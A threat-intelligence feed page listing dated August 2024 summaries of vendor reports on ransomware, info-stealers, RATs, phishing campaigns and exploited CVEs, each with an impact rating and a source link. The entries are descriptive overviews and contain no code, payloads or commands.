Python's popularity among attackers on Windows is due to its ease of deployment, extensibility with libraries, and ability to bypass AMSI (Anti-Malware Scan Interface). This versatility gives Python the capability to access numerous system components and APIs, which makes it useful for malicious purposes. Attackers often use batch files to deliver and reconstruct Python scripts for tasks like data exfiltration.
Source: https://isc.sans.edu/diary/rss/31208
2024-08-28
BlackByte_Ransomware_Tactics_and_New_Developments
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
BlackByte_Ransomware_Tactics_and_New_Developments
Date of Scan:
2024-08-28
Impact:
MEDIUM
Summary:
Researchers from Cisco Talos have seen that BlackByte ransomware is employing techniques that depart from their well-established tradecraft. For example, they have taken advantage of a vulnerability in VMware ESXi that allows for authentication bypass, known as CVE-2024-37085, shortly after it was discovered, and have used the victim's authorized remote access method rather than utilizing a commercial remote administration tool like AnyDesk.
Source: https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecraft-with-newly-disclosed-vulnerabilities-to-support-ongoing-attacks/
2024-08-28
A_New_Variant_of_Snake_Keylogger
LOW
+
Intel Source:
Fortinet
Intel Name:
A_New_Variant_of_Snake_Keylogger
Date of Scan:
2024-08-28
Impact:
LOW
Summary:
Fortinet researchers have uncovered a phishing campaign where attackers send emails with a malicious Excel file. The email tricks users into opening the file by claiming that funds have been transferred to their account. However, once the user opens the file, it secretly runs malicious code that downloads and installs a new version of Snake Keylogger. The main function of this malware is to steal login details from various software such as web browsers, email clients and FTP clients, and then send the stolen data to the attacker via email using the SMTP protocol.
Source: https://www.fortinet.com/blog/threat-research/deep-analysis-of-snake-keylogger-new-variant
2024-08-28
CVE_2023_22527_Exploiting_for_Cryptojacking
LOW
+
Intel Source:
Trend Micro
Intel Name:
CVE_2023_22527_Exploiting_for_Cryptojacking
Date of Scan:
2024-08-28
Impact:
LOW
Summary:
Researchers from Trend Micro have assessed that CVE-2023-22527 is a critical vulnerability currently exploited for cryptojacking, where attackers turn compromised systems into cryptomining operations. These attacks involve deploying shell scripts and XMRig miners against SSH endpoints that kill competing miners and are scheduled as cron jobs for execution.
Source: https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html
2024-08-28
CVE20247262_APTC60_Exploitation
MEDIUM
+
Intel Source:
ESET
Intel Name:
CVE20247262_APTC60_Exploitation
Date of Scan:
2024-08-28
Impact:
MEDIUM
Summary:
ESET researchers have discovered a vulnerability (CVE-2024-7262) in WPS Office for Windows, which is used by 500 million users globally. This vulnerability was being exploited by a cyberespionage group called APT-C-60 from South Korea to attack individuals and organizations in East Asia. The vulnerability was found in a spreadsheet file that appears normal but contains a malicious link. When a user clicks this link in WPS Spreadsheet, it executes malicious code on their computer. The objective of the attack is to install a backdoor called SpyGlace, which allows attackers to remotely control the victim’s computer.
Source: https://www.welivesecurity.com/en/eset-research/analysis-of-two-arbitrary-code-execution-vulnerabilities-affecting-wps-office/
2024-08-28
Versa_Director_Zero_Day_Exploit_CVE_2024_39717
LOW
+
Intel Source:
Lumen
Intel Name:
Versa_Director_Zero_Day_Exploit_CVE_2024_39717
Date of Scan:
2024-08-28
Impact:
LOW
Summary:
Researchers from Lumen Technologies have discovered a zero-day vulnerability (CVE-2024-39717) in Versa Director servers, which are used to manage SD-WAN setups. This bug affects all versions prior to 22.1.4. Attackers can exploit the vulnerability by using a modified web shell called "VersaMem" to steal passwords and obtain access to client networks.
Source: https://blog.lumen.com/taking-the-crossroads-the-versa-director-zero-day-exploitation/
2024-08-28
AgenziaEntrate_Phishing_Campaign
LOW
+
Intel Source:
AGID-CERT
Intel Name:
AgenziaEntrate_Phishing_Campaign
Date of Scan:
2024-08-28
Impact:
LOW
Summary:
Researchers at CERT-AGID have tracked phishing emails impersonating the Revenue Agency. In such messages, the user is told that a payment was made and that monetary compensation is due, and the email requests the user to fill out a form so that the refund can be processed. This scam is aimed at obtaining the personal and banking details of the targets.
Source: https://x.com/agidcert/status/1828445147463356550?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-08-27
Operation_DevilTiger
MEDIUM
+
Intel Source:
QiAnXIn
Intel Name:
Operation_DevilTiger
Date of Scan:
2024-08-27
Impact:
MEDIUM
Summary:
APT-Q-12, also known as Pseudo Hunter, is a cyber espionage group with a Northeast Asian background, targeting countries in East Asia, including China, North Korea, Japan, and South Korea. It was first identified by BlackBerry in 2017 and connected with the Darkhotel organization, but the group later changed its operations. Between 2019 and the present there was less visible related activity, while new attack patterns focused on the Korean Peninsula appeared, indicating that these are elements belonging to Darkhotel. Research shows that APT groups use various plugins to tailor their data exfiltration methods to their specific needs.
Source: https://ti.qianxin.com/blog/articles/operation-deviltiger-0day-vulnerability-techniques-and-tactics-used-by-apt-q-12-disclosed-en/
2024-08-27
From_Obfuscated_Batch_File_to_XWorm_and_Redline
LOW
+
Intel Source:
ISC.SANS
Intel Name:
From_Obfuscated_Batch_File_to_XWorm_and_Redline
Date of Scan:
2024-08-27
Impact:
LOW
Summary:
According to the SANS researchers, a new form of malware has emerged, designed to spread via spam emails and exploit kits. One such obfuscation technique is illustrated in the report, where an encoded batch file is used for XWorm and Redline malware deployment. The report then highlights how these early layers of obfuscation were eventually used to inject XWorm and Redline into the system.
Source: https://isc.sans.edu/diary/From+Highly+Obfuscated+Batch+File+to+XWorm+and+Redline/31204/
2024-08-27
AutoIT_Bot_Targets_Gmai_Accounts
LOW
+
Intel Source:
SonicWall
Intel Name:
AutoIT_Bot_Targets_Gmai_Accounts
Date of Scan:
2024-08-27
Impact:
LOW
Summary:
Researchers at SonicWall have discovered an AutoIT-compiled executable that tries to open Gmail login pages using different web browsers such as MS Edge, Chrome and Firefox. It can read clipboard data, capture keystrokes, switch users, and even restart or shut down the system. It can also detect if it is being analysed by a debugger and can block user input or take control of the keyboard and mouse when needed. Researchers also advise caution when running unknown files, particularly those with vague names like file.exe.
Source: https://blog.sonicwall.com/en-us/2024/08/autoit-bot-targets-gmail-accounts-first/
2024-08-27
HZ_Rat_Backdoor_Targets_macOS_Users
LOW
+
Intel Source:
Securelist
Intel Name:
HZ_Rat_Backdoor_Targets_macOS_Users
Date of Scan:
2024-08-27
Impact:
LOW
Summary:
Researchers from Securelist have observed a macOS version of the HZ Rat backdoor that targets users of the enterprise messaging service DingTalk and the messaging network WeChat. This discovery suggests that the threat actors behind past attacks are still active. During the research, it was found that the malware primarily collects user data, but it has the ability to spread laterally across the victim's network. The collected data, which includes company and contact information, might be used to monitor individuals of interest and plan future attacks.
Source: https://securelist.com/hz-rat-attacks-wechat-and-dingtalk/113513/
2024-08-27
A_Deep_Dive_Into_Angry_Stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
A_Deep_Dive_Into_Angry_Stealer
Date of Scan:
2024-08-27
Impact:
LOW
Summary:
Cyfirma researchers have discovered a new malware called Angry Stealer, which is being promoted on Telegram and other online platforms. The malware, written in .NET, installs two malicious files, Stepasha.exe and MotherRussia.exe. Stepasha.exe is designed to steal sensitive data such as browser information, cryptocurrency wallets, VPN credentials, and system details. Angry Stealer is based on another malware called “Rage Stealer” and shares similar features. Additionally, MotherRussia.exe is a tool that helps create more malicious programs, potentially for further attacks such as remote desktop access and bot operations.
Source: https://www.cyfirma.com/research/a-comprehensive-analysis-of-angry-stealer-rage-stealer-in-a-new-disguise/
2024-08-27
New_AppDomainManager_Injection_Malware_Trend
MEDIUM
+
Intel Source:
NTT
Intel Name:
New_AppDomainManager_Injection_Malware_Trend
Date of Scan:
2024-08-27
Impact:
MEDIUM
Summary:
Researchers from NTT have observed recent incidents where AppDomainManager Injection executes malware, a technique first seen in 2017. The attack technique involves downloading a ZIP file from an attacker-controlled website or receiving it via spear phishing email. The ZIP file contains a malicious MSC file exploiting the GrimResource technique, which allows malicious actions upon simply opening the MSC file, bypassing the need for user interaction. These MSC files often disguise themselves with misleading icons, like those of PDFs or Windows certificates.
Source: https://jp.security.ntt/tech_blog/appdomainmanager-injection
2024-08-27
Godzilla_WebShell_Targeting_Financial_Sector
LOW
+
Intel Source:
ASEC
Intel Name:
Godzilla_WebShell_Targeting_Financial_Sector
Date of Scan:
2024-08-27
Impact:
LOW
Summary:
Researchers from ASEC have discovered a recent attack targeting the financial sector using a vulnerability in the ASP.NET ViewState function. The attack caused the Godzilla WebShell malware to be installed on target systems. This WebShell is not only meant for command execution, file operations, and shellcode launching, but comes with features for further exploitation including mimikatz and petitpotam. It is significant to point out that Godzilla WebShell uses a fileless technique, where the binaries are kept inside the session metadata rather than on disk.
Source: https://asec.ahnlab.com/ko/82668/
2024-08-27
Gulaoder_Malware
LOW
+
Intel Source:
Palo Alto
Intel Name:
Gulaoder_Malware
Date of Scan:
2024-08-27
Impact:
LOW
Summary:
Palo Alto researchers have identified GuLoader malware, which installs the Remcos RAT on compromised machines. This malware includes a file called "Web Browser Password Viewer" that steals login credentials from the compromised system and sends them to the attacker through the Remcos RAT communication channel. The malware also keeps the attacker informed about any activity on the compromised system, allowing the attacker to monitor the system in real time.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-26-GuLoader-for-Remcos-RAT-IOCs.txt
2024-08-27
AsyncRAT_Escalates_with_TryCloudflare_Tunnels
LOW
+
Intel Source:
Forcepoint
Intel Name:
AsyncRAT_Escalates_with_TryCloudflare_Tunnels
Date of Scan:
2024-08-27
Impact:
LOW
Summary:
AsyncRAT is a well-known malware that enables the attacker to remotely access an infected Windows system and perform actions such as exfiltrating sensitive data, and it is known for evading antivirus detection. Recent research from Forcepoint X-Labs has uncovered an unexpected campaign making use of TryCloudflare’s tunnel tool and Python packages to deliver AsyncRAT. Attackers use "search-ms" URIs embedded in HTML email attachments for the malicious deployment of LNK files and Python scripts. The campaign mainly targets the health, travel and banking industries using phishing attacks, with a noticeable surge in activity in recent days.
Source: https://www.forcepoint.com/blog/x-labs/asyncrat-python-trycloudflare-malware?utm_source=Forcepoint&utm_medium=linkedin&utm_campaign=websecurity%2Cglobalpost%2Cemailsecurity%2Caudiencebuilding%2CBlog-X-Labs%2Cnoproduct
2024-08-27
New_Spyder_Downloader_Variant_Revealed
MEDIUM
+
Intel Source:
QiAnXIn
Intel Name:
New_Spyder_Downloader_Variant_Revealed
Date of Scan:
2024-08-27
Impact:
MEDIUM
Summary:
Researchers at QiAnXIn have identified a new variant of the Spyder downloader, previously analyzed in reports by the same center. This updated Spyder downloader, while maintaining its core functionality of releasing and executing components from remotely downloaded encrypted ZIP packages, now also deploys two new steganographic components. These components are used for taking screenshots and collecting file information. Notable changes in this variant include modifications to the code structure and C&C (Command and Control) communication format.
Source: https://ti.qianxin.com/blog/articles/analysis-of-new-variants-and-components-of-patchwork-spyder-downloader-en/
2024-08-26
BlackSuit_Ransomware_Update
MEDIUM
Intel Source:
DFIR Report
Intel Name:
BlackSuit_Ransomware_Update
Date of Scan:
2024-08-26
Impact:
MEDIUM
Summary:
DFIR Report tracked an intrusion that culminated in the deployment of BlackSuit ransomware, following the execution of a Cobalt Strike beacon. The attack, spread over 15 days, involved a range of tools such as Sharphound, Rubeus, and SystemBC, with command and control traffic concealed via Cloudflare. The attacker leveraged Windows utilities for system enumeration, moved laterally through SMB and RDP, and deployed multiple Cobalt Strike beacons. On the final day, after executing ADFind and PowerShell scripts, the BlackSuit ransomware was distributed via SMB and executed manually, resulting in encrypted files and ransom notes across the affected systems.
Source: https://thedfirreport.com/2024/08/26/blacksuit-ransomware/#indicators
2024-08-26
MalwareHunterTeam_Aug26
MEDIUM
Intel Source:
Twitter
Intel Name:
MalwareHunterTeam_Aug26
Date of Scan:
2024-08-26
Impact:
MEDIUM
Summary:
August 26, 2024 findings from MalwareHunterTeam
Source: https://x.com/malwrhunterteam
2024-08-26
Sedexp_Linux_Malware
MEDIUM
Intel Source:
Aon
Intel Name:
Sedexp_Linux_Malware
Date of Scan:
2024-08-26
Impact:
MEDIUM
Summary:
Stroz Friedberg uncovered a stealthy Linux malware named "sedexp" that exploits the lesser-known udev rules to maintain persistence and evade detection. Active since 2022, sedexp operates by executing whenever specific device events occur, notably using memory manipulation to hide itself from common system commands. It also features reverse shell capabilities, enabling attackers to remotely control compromised systems. Primarily used by financially motivated actors, sedexp has been linked to credit card scraping activities on web servers.
Source: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
2024-08-23
Malware_disguised_as_a_browser_update
LOW
Intel Source:
ASEC
Intel Name:
Malware_disguised_as_a_browser_update
Date of Scan:
2024-08-23
Impact:
LOW
Summary:
ASEC researchers have identified malware spreading through infected websites, disguised as a browser update, to unspecified targets. When a user visits one of these sites, a fake Chrome or Firefox update prompt appears, asking the user to download a malicious file directly. The downloaded files come in different formats such as EXE, ZIP, APPX, and VHD (virtual disk file). Inside the VHD there is a hidden shortcut file (LNK) that triggers malicious activity via PowerShell commands and communicates with the attacker's C&C server. Attackers are increasingly using legitimate online services to distribute this malware.
Source: https://asec.ahnlab.com/ko/82620/
2024-08-23
Enhancing_Detection_via_ssdeep_Fuzzy_Hashing
LOW
Intel Source:
Checkpoint
Intel Name:
Enhancing_Detection_via_ssdeep_Fuzzy_Hashing
Date of Scan:
2024-08-23
Impact:
LOW
Summary:
Check Point researchers are investigating the usage of ssdeep, a fuzzy hashing software, to improve phishing and malware detection. Ssdeep generates fuzzy hashes that identify similar material in files by recognizing patterns in code, and while it is well-known for malware detection, its success in detecting new threats depends on enhanced AI analytics.
Source: https://blog.checkpoint.com/security/enhancing-phishing-and-malware-detection-with-ssdeep-fuzzy-hashing/
2024-08-23
Bling_Libra_Exploiting_AWS
LOW
Intel Source:
PaloAlto
Intel Name:
Bling_Libra_Exploiting_AWS
Date of Scan:
2024-08-23
Impact:
LOW
Summary:
Researchers from Palo Alto Networks have discovered that Bling Libra, the gang behind the ShinyHunters ransomware, has shifted its focus from data theft to the complete extortion of its victims. In a recent case, Bling Libra gained access to an organization's AWS environment using legitimate credentials discovered in public repositories. Although the breach was less severe because of the limited permissions granted by these credentials, the gang was still able to access and modify data in S3 buckets.
Source: https://unit42.paloaltonetworks.com/shinyhunters-ransomware-extortion/
2024-08-23
Cthulhu_Stealer_Malware_Targeting_macOS_Users
LOW
Intel Source:
Cado Security
Intel Name:
Cthulhu_Stealer_Malware_Targeting_macOS_Users
Date of Scan:
2024-08-23
Impact:
LOW
Summary:
Cado Security researchers have recently found Cthulhu Stealer, a malware-as-a-service (MaaS) that targets Mac users. This malware, delivered as an Apple disk image (DMG), includes binaries for multiple platforms and is written in Go. It disguises itself as legitimate software and lures users into opening the DMG, then uses macOS's osascript tool to prompt for their password, giving the attacker unauthorized access.
Source: https://www.cadosecurity.com/blog/from-the-depths-analyzing-the-cthulhu-stealer-malware-for-macos
2024-08-23
APT_Attack_by_using_noMu_Backdoor
LOW
Intel Source:
ASEC
Intel Name:
APT_Attack_by_using_noMu_Backdoor
Date of Scan:
2024-08-23
Impact:
LOW
Summary:
Researchers at ASEC have discovered that an unknown attacker has been targeting users and systems in South Korea with various remote-control malware. The attacker uses tools like reverse shells, backdoors, and software for remote screen control such as VNC and RDP to target Korean users. They use malware like Fxfdoor and noMu along with remote control tools like AsyncRAT, TightVNC, Netcat and AnyDesk to control infected systems. They also install a tool called WebBrowserPassView to steal saved passwords from web browsers, aiming to steal information.
Source: https://asec.ahnlab.com/ko/82628/
2024-08-23
Active_C2_Panels_of_Meduza_Stealer_Revealed
LOW
Intel Source:
X (Twitter)
Intel Name:
Active_C2_Panels_of_Meduza_Stealer_Revealed
Date of Scan:
2024-08-23
Impact:
LOW
Summary:
Meduza Stealer is malware designed to steal sensitive information from compromised systems. Active Command and Control (C2) panels of Meduza Stealer are the interfaces cybercriminals use to manage and control infected devices. These panels allow attackers to execute commands, collect stolen data, and monitor the status of infected machines in real time. The presence of active C2 panels indicates ongoing malicious activity and a continuing threat to system security.
Source: https://x.com/FalconFeedsio/status/1826613611961483476
2024-08-23
Fake_Funeral_Scams_Target_Facebook_Users
LOW
Intel Source:
MalwareBytes
Intel Name:
Fake_Funeral_Scams_Target_Facebook_Users
Date of Scan:
2024-08-23
Impact:
LOW
Summary:
Malwarebytes researchers have discovered that scammers on Facebook are exploiting grieving individuals by using fake funeral live stream links and stolen images. These scammers trick people into clicking the links in order to steal money or credit card information. There are two primary tactics: one involves fake funeral live stream links that encourage people to click and share the link with friends and family; the other asks for donations on behalf of the deceased's family. These scams often begin with a comment under a funeral home's announcement on Facebook.
Source: https://www.malwarebytes.com/blog/news/2024/08/fake-funeral-live-stream-scams-target-grieving-users-on-facebook
2024-08-23
New_puNK_003_Malware_CURKON_Linked_to_KONNI_Group
LOW
Intel Source:
S2W BLOG
Intel Name:
New_puNK_003_Malware_CURKON_Linked_to_KONNI_Group
Date of Scan:
2024-08-23
Impact:
LOW
Summary:
S2W researchers discovered and analyzed CURKON, a new malware belonging to the puNK-003 group, a North Korean APT, on April 24th, 2024. Unlike the dropper-type malware used by the KONNI group, CURKON is an LNK file that functions as a downloader. It downloads AutoIt scripts that eventually run Lilith RAT, which has been re-implemented as an AutoIt script. This RAT uses a reverse shell to allow remote command execution. Whereas KONNI employs VBS and BAT scripts, CURKON relies on AutoIt. However, although they are classified separately, the obfuscation techniques used in CURKON suggest a connection to KONNI.
Source: https://medium.com/s2wblog/threat-tracking-analysis-of-punk-003s-lilith-rat-ported-to-autoit-script-30dd59e68213
2024-08-22
Unmasking_Cloud_Extortion_Campaign
LOW
Intel Source:
Cyble
Intel Name:
Unmasking_Cloud_Extortion_Campaign
Date of Scan:
2024-08-22
Impact:
LOW
Summary:
Researchers from Cyble have found a sophisticated cloud extortion campaign targeting 110,000 domains through misconfigured AWS .env files. By scanning insecure web apps for exposed .env files, the attackers gathered credentials and held cloud storage data for ransom. The attackers used stolen AWS Identity and Access Management (IAM) access keys to create new IAM roles with full permissions.
Source: https://cyble.com/blog/widespread-cloud-exposure/
2024-08-22
PG_MEM_Malware_Targets_PostgreSQL_for_Mining
MEDIUM
Intel Source:
Aqua Sec
Intel Name:
PG_MEM_Malware_Targets_PostgreSQL_for_Mining
Date of Scan:
2024-08-22
Impact:
MEDIUM
Summary:
Aqua Security researchers have discovered PG_MEM, a new PostgreSQL malware that brute-forces its way into databases, inserts payloads to hide its behavior, and mines cryptocurrency. They documented a successful brute-force attack on a PostgreSQL database that took advantage of a feature allowing command execution.
Source: https://aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/
2024-08-22
Hundreds_of_Online_Stores_Hacked
LOW
Intel Source:
MalwareBytes
Intel Name:
Hundreds_of_Online_Stores_Hacked
Date of Scan:
2024-08-22
Impact:
LOW
Summary:
Malwarebytes recently detected a new malware campaign targeting online stores built on the Magento e-commerce platform. The attackers injected malicious code into hundreds of sites, allowing them to steal customers' credit card information during checkout. The skimmer is hidden within a simple script tag that loads obfuscated JavaScript, which seamlessly inserts a fake "Payment Method" frame to capture sensitive data such as credit card numbers, expiration dates, and CVV codes in real time.
Source: https://www.malwarebytes.com/blog/news/2024/08/hundreds-of-online-stores-hacked-in-new-campaign
2024-08-22
Fake_Survey_Targets_Office_365_Login
MEDIUM
Intel Source:
Cofense
Intel Name:
Fake_Survey_Targets_Office_365_Login
Date of Scan:
2024-08-22
Impact:
MEDIUM
Summary:
The Cofense Phishing Defense Center recently uncovered a phishing campaign that uses fake employee engagement surveys to steal Microsoft Office 365 credentials. In this campaign, threat actors sent emails posing as mid-year engagement surveys and duped employees into entering their usernames. The phishing email used a fake domain and an authoritative tone, urging recipients to complete a survey at Wufoo, a site often misused for such fraudulent activity. The page asked for the employee's full name before redirecting them to a fraudulent Microsoft login page.
Source: https://cofense.com/blog/mid-year-engagement-trap-how-fake-surveys-are-used-in-phishing
2024-08-22
PEAKLIGHT
MEDIUM
Intel Source:
Mandiant Google
Intel Name:
PEAKLIGHT
Date of Scan:
2024-08-22
Impact:
MEDIUM
Summary:
Mandiant has uncovered a new memory-only malware dropper called PEAKLIGHT, which is used to deliver various malware, including LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. The infection begins with malicious LNK files disguised as pirated movie downloads, which execute PowerShell scripts via system binaries. PEAKLIGHT operates as an obfuscated PowerShell-based downloader that checks for specific files and, if they are absent, retrieves them from a content delivery network (CDN). The malware employs several evasion techniques, such as CDN abuse and binary proxy execution, making it harder to detect. Mandiant observed multiple variations of the downloader, each with unique characteristics and payloads.
Source: https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/
2024-08-22
Cheana_Stealer_Targets_VPN_Users
LOW
Intel Source:
Cyble
Intel Name:
Cheana_Stealer_Targets_VPN_Users
Date of Scan:
2024-08-22
Impact:
LOW
Summary:
Cyble researchers have identified a phishing campaign where attackers are targeting people who are trying to download VPN applications for Windows, Linux, and macOS. The attackers created a fake website that mimics the legitimate 'WarpVPN' service, tricking users into installing a malicious program called Cheana Stealer. This malware steals sensitive information like cryptocurrency data, browser logins, cookies, SSH keys, and macOS passwords. The phishing site offers detailed installation instructions specific to each platform (Windows, Linux, macOS) to ensure the malware runs properly.
Source: https://cyble.com/blog/new-cheana-stealer-targets-vpn-user/
2024-08-22
Uncovering_Typosquatting
LOW
Intel Source:
Cado Security
Intel Name:
Uncovering_Typosquatting
Date of Scan:
2024-08-22
Impact:
LOW
Summary:
In a recent routine check, Cado Security researchers have identified a typosquatting domain that closely resembled their corporate website. This domain was part of a deceptive tactic used by cybercriminals to trick users into visiting a fraudulent site.
Source: https://www.cadosecurity.com/blog/vigilance-in-action-monitoring-typosquatting-domains
2024-08-21
A_New_Opportunistic_Log4j_Campaign
LOW
Intel Source:
Datadog
Intel Name:
A_New_Opportunistic_Log4j_Campaign
Date of Scan:
2024-08-21
Impact:
LOW
Summary:
Researchers at Datadog have identified an opportunistic campaign in which attackers are leveraging the Log4j vulnerability (CVE-2021-44228) to launch crypto-mining attacks and compromise systems. The attackers use obfuscated LDAP requests to evade detection and execute malicious scripts on vulnerable Java applications. Once the script is executed, it performs system checks, installs a crypto-mining program, and sets up backdoors for ongoing control. It also gathers complete system information and sends it to a remote server, then deletes itself, clears the command history, and removes traces of its execution.
Source: https://securitylabs.datadoghq.com/articles/the-gift-that-keeps-on-giving-a-new-opportunistic-log4j-campaign/
2024-08-21
August2024_Phishing_Campaigns
MEDIUM
Intel Source:
AnyRun
Intel Name:
August2024_Phishing_Campaigns
Date of Scan:
2024-08-21
Impact:
MEDIUM
Summary:
ANY.RUN researchers have discovered several sophisticated phishing campaigns, including the Tycoon 2FA Phish-kit, which exploits compromised Amazon SES accounts and uses multiple redirects to conceal phishing pages. Some variants display fake error messages to trick users into entering credentials, while others target U.S. government organizations by impersonating Microsoft Teams. Another campaign abuses Freshdesk's email API to host phishing pages, and a large-scale phishing effort uses SharePoint to host malicious PDFs, making detection difficult. These attacks often employ CAPTCHA and legitimate-looking pages to evade security measures.
Source: https://any.run/cybersecurity-blog/phishing-campaigns-august-24
2024-08-21
Quickly_Thwarts_Play_Ransomware_Attack
LOW
Intel Source:
Trend Micro
Intel Name:
Quickly_Thwarts_Play_Ransomware_Attack
Date of Scan:
2024-08-21
Impact:
LOW
Summary:
Trend Micro researchers have identified and contained a Play ransomware infection through a coordinated response. The attack involved Play ransomware together with SYSTEMBC, a proxy malware used to deliver additional payloads, and GRIXBA, a customized tool built to avoid signature-based detection. The attackers abused legitimate tools such as PsExec and Remote Desktop Protocol (RDP) in a "living-off-the-land" style, operating on their targets without triggering security controls.
Source: https://www.trendmicro.com/en_us/research/24/h/pressing-pause-on-play-ransomware.html
2024-08-21
DNS_Traffic_Analysis_for_Cyber_Threats
LOW
Intel Source:
PaloAlto
Intel Name:
DNS_Traffic_Analysis_for_Cyber_Threats
Date of Scan:
2024-08-21
Impact:
LOW
Summary:
Researchers from Palo Alto Networks have observed that rogue DNS requests exhibit unusual patterns when compared to legitimate traffic, allowing them to identify potentially risky domains. They created an autoencoder-based deep learning solution that profiles and encodes DNS traffic in real time. By establishing a baseline of common DNS activity and incorporating threat intelligence, they developed a classifier that detects the unusual patterns associated with cyber threats.
Source: https://unit42.paloaltonetworks.com/profiling-detecting-malicious-dns-traffic/
2024-08-21
New_MoonPeak_RAT_Linked_to_North_Korean_Group
LOW
Intel Source:
Cisco Talos
Intel Name:
New_MoonPeak_RAT_Linked_to_North_Korean_Group
Date of Scan:
2024-08-21
Impact:
LOW
Summary:
Researchers at Cisco Talos have discovered a new RAT family called “MoonPeak” which was developed from an open-source XenoRAT malware. This version is currently being enhanced by a North Korean APT named UAT-5394. Their investigation into the infrastructure associated with this campaign has unveiled further connections to the UAT-5394 network, along with new tactics, techniques, and procedures (TTPs) employed by the attackers.
Source: https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/
2024-08-21
New_Vidar_Campaign_Spreading_via_PEC
LOW
Intel Source:
CERT-AGID
Intel Name:
New_Vidar_Campaign_Spreading_via_PEC
Date of Scan:
2024-08-21
Impact:
LOW
Summary:
CERT-AGID researchers have uncovered a new wave of malicious emails spreading the Vidar malware through PEC (Certified Electronic Mail). These emails look like replies to previous messages and include a link to download a malicious JavaScript file, which is served only if the request comes from a Windows machine. The attackers use multiple subdomains to avoid detection, but all the malicious scripts ultimately lead to the same malicious URL. The attackers continue to change their methods to stay ahead of detection.
Source: https://cert-agid.gov.it/news/contrastata-nuova-campagna-vidar-diffusa-via-pec/
2024-08-21
Slack_Malvertising
MEDIUM
Intel Source:
MalwareBytes
Intel Name:
Slack_Malvertising
Date of Scan:
2024-08-21
Impact:
MEDIUM
Summary:
Malwarebytes researchers recently discovered a malvertising campaign targeting Slack through Google search ads. Initially, the ad appeared legitimate and redirected users to Slack's official site, but over time it began redirecting through a click tracker to a malicious domain. This domain impersonated Slack and delivered malware linked to SecTopRAT, a remote access trojan. The threat actors used tactics such as cloaking and click trackers to evade detection, making it challenging to trace the ad's true intent and behavior.
Source: https://www.malwarebytes.com/blog/news/2024/08/fraudulent-slack-ad-shows-malvertisers-patience-and-skills
2024-08-21
Todoswift_Malware_Targets_MacOs
LOW
Intel Source:
Kandji
Intel Name:
Todoswift_Malware_Targets_MacOs
Date of Scan:
2024-08-21
Impact:
LOW
Summary:
Kandji researchers have discovered a new malware called TodoSwift that is linked to the North Korean hacking group BlueNoroff. The malware is disguised as a legitimate SwiftUI application that tricks users by pretending to download and display a PDF about Bitcoin price predictions. While the PDF is downloaded, the malware secretly fetches a more dangerous program from a suspicious URL in the background using a curl command, to avoid detection. This second-stage malware can steal data or allow remote control of the infected system.
Source: https://www.kandji.io/blog/todoswift-disguises-malware-download-behind-bitcoin-pdf
2024-08-20
TA453_Targets_Religious_Figure_with_BlackSmith
LOW
Intel Source:
Proofpoint
Intel Name:
TA453_Targets_Religious_Figure_with_BlackSmith
Date of Scan:
2024-08-20
Impact:
LOW
Summary:
Researchers from Proofpoint have discovered that the Iranian threat actor TA453 is targeting a well-known religious figure by disguising a malicious attack as a fake podcast interview invitation. The attack chain starts with a harmless email to establish trust, followed by a malicious link that downloads a new malware toolkit called BlackSmith. This toolkit includes AnvilEcho, a PowerShell trojan that combines TA453's prior malicious features into a single script.
Source: https://www.proofpoint.com/us/blog/threat-insight/best-laid-plans-ta453-targets-religious-figure-fake-podcast-invite-delivering
2024-08-20
Diving_Deep_into_Cybervolk_Ransomware
LOW
Intel Source:
Threat Mon
Intel Name:
Diving_Deep_into_Cybervolk_Ransomware
Date of Scan:
2024-08-20
Impact:
LOW
Summary:
CyberVolk Group, a threat actor from India and part of the Holy League with Russian ties, released CyberVolk Ransomware-as-a-Service (RaaS) on July 1, 2024. This ransomware, available for $1,000, encrypts files with the .CyberVolk extension using advanced encryption algorithms like ChaCha20-Poly1305, AES, RSA, and quantum-resistant methods.
Source: https://45734016.fs1.hubspotusercontent-na1.net/hubfs/45734016/cybervolk-ransomware-technical-malware-analysis.pdf?__hstc=205617164.4ca88179e9c4de00be257a0ec5f4dee7.1721037753230.1723615766423.1724155304095.7&__hssc=205617164.1.1724155304095&__hsfp=1218336316
2024-08-20
GreenCharlie_Phishing_Activities
MEDIUM
Intel Source:
Recorded Future
Intel Name:
GreenCharlie_Phishing_Activities
Date of Scan:
2024-08-20
Impact:
MEDIUM
Summary:
Researchers from Recorded Future have identified GreenCharlie, a group potentially acting on behalf of the Islamic Revolutionary Guard Corps (IRGC), as the source of multiple dynamic DNS domain registrations since May 2024, most likely for phishing and social engineering. This group is tied to the GORBLE malware, which targets US political candidates. It most likely uses ProtonVPN or ProtonMail, with associated Iranian IP addresses, indicating spearphishing attempts against research analysts, government officials, diplomats, and other high-value targets.
Source: https://go.recordedfuture.com/hubfs/reports/cta-ir-2024-0820.pdf
2024-08-20
Brain_Cipher_Targets_CVE_2023_28252_Exploit
MEDIUM
Intel Source:
Linkedin
Intel Name:
Brain_Cipher_Targets_CVE_2023_28252_Exploit
Date of Scan:
2024-08-20
Impact:
MEDIUM
Summary:
The Brain Cipher Ransomware Group is suspected of exploiting CVE-2023-28252, a privilege escalation vulnerability in the Microsoft Windows CLFS driver. Previously used by the now inactive Nokoyawa Ransomware Group, this exploit is being disguised under filenames like `clfs_eop.exe` to spread. The exploit is still available on underground markets for $5K to $25K, indicating that many systems remain unpatched and vulnerable.
Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_braincipher-ransomware-brain-activity-7230471679741718528-Bmbx/?utm_source=share&utm_medium=member_ios
2024-08-20
Msupedge_Backdoor_Using_DNS_in_Taiwan_Attack
MEDIUM
Intel Source:
Symantec
Intel Name:
Msupedge_Backdoor_Using_DNS_in_Taiwan_Attack
Date of Scan:
2024-08-20
Impact:
MEDIUM
Summary:
Researchers from Symantec have found a new backdoor known as 'Msupedge,' which targets a university in Taiwan. This backdoor communicates with its command and control server via DNS tunneling, a stealthy communication method. This process is based on the dnscat2 utility and allows the backdoor to receive commands using DNS name resolution.
